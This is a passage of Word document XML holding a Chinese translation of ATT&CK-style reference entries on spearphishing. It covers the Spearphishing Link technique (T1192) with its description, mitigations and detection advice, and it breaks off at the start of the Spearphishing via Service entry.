          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>入侵防御系统（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>IPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）和邮件网关可以用来检测传输中的带恶意附件的钓鱼邮件。沙箱可以用来识别恶意附件。相关的检测方法可以是基于特征码检测也可以是基于行为检测，但是攻击者也会试图构造特别的附件来逃避这些检测方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F91124" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>当邮件存储在邮件服务器上或者用户计算机上时，杀毒软件可以用来检测恶意文件或附件。终端探针或者网络探针也可以用来检测附件被打开后的恶意行为（比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>PDF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>文件被打开后创建了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>进程或者连接了互联网），相关的攻击技术有“客户端执行利用”和“脚本编程”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33134196" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C7E81C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>鱼叉式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>钓鱼</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>链接</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="3D229924" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04202F7D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1192</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61CA77CE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F631488" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07177CC7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>网络抓包</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>代理，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>邮件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>网关，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>沙箱</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>SSL/TLS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>DNS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>记录，邮件服务器</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B1A89D4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:color w:val="000000" w:themeColor="text1"/>
                </w:rPr>
                <w:t>CAPEC-163</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="342651F3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7359C6F4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5632666A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带链接的鱼叉式钓鱼攻击是一种特殊变种。它与其他形式的鱼叉式钓鱼攻击不同之处在于它在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>邮件中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供链接来下载恶意软件，而不是以附件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>形式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将恶意文件附加到邮件中。这样可以躲开邮件附件检查。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668FE060" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有形式的鱼叉式钓鱼攻击都是以电子方式传递的社会工程，针对特定个人、公司或行业。本节</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>所描述的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>链接的鱼叉式钓鱼攻击，也就是在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件里携带恶意链接。通常，链接将伴随社会工程文本，并需要用户主动点击或将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制粘贴到浏览器中，也就是利用用户执行。访问的网站可能会利用漏洞来破坏</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器，或者提示用户下载应用、文档、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>件，甚至可执行文件（具体</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>取决于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一开始是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>以什么理由</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送的这封</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>邮件）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>还可能会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件中添加链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与邮件阅读器交互，比如嵌入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>图像</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（网络漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络信标）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接利用终端系统或验证</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>邮件接收</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389FA3FC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="9972" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7425"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005C4554" w14:paraId="2279A6D8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5F62BD9B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6A10D2F3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="44ADD519" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30027BE5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内容限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A57C858" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确定某些可用于鱼叉式钓鱼攻击的网站是否是业务运营所必需的。如果无法</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>有效监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>活动或是存在重大风险，请考虑阻止访问这些</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>网站</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="337FFC26" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BD506F5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户培训</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1678CDE8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>用户培训，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使其</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>有能力</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>识别带恶意链接的社会工程技术和钓鱼邮件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FF9007D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E94AE94" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FA1E36" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>电子邮件执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查（包括扩展缩短的链接）来发现导向已知恶意站点的链接。可用沙箱来检测这些链接，并自动转到这些站点以确定它们是否存在恶意。若用户访问链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>沙箱</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等待并捕获内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E65CB2B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此技术通常涉及端点上的用户交互。一旦用户执行交互</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>动作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就会针对鱼叉式钓鱼攻击链接进行合理</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62300A62" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00085A28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过服务进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>鱼叉式钓鱼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="6D9899F1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="680B42AB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t>: T1194</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="130977A2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D3F4FB3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
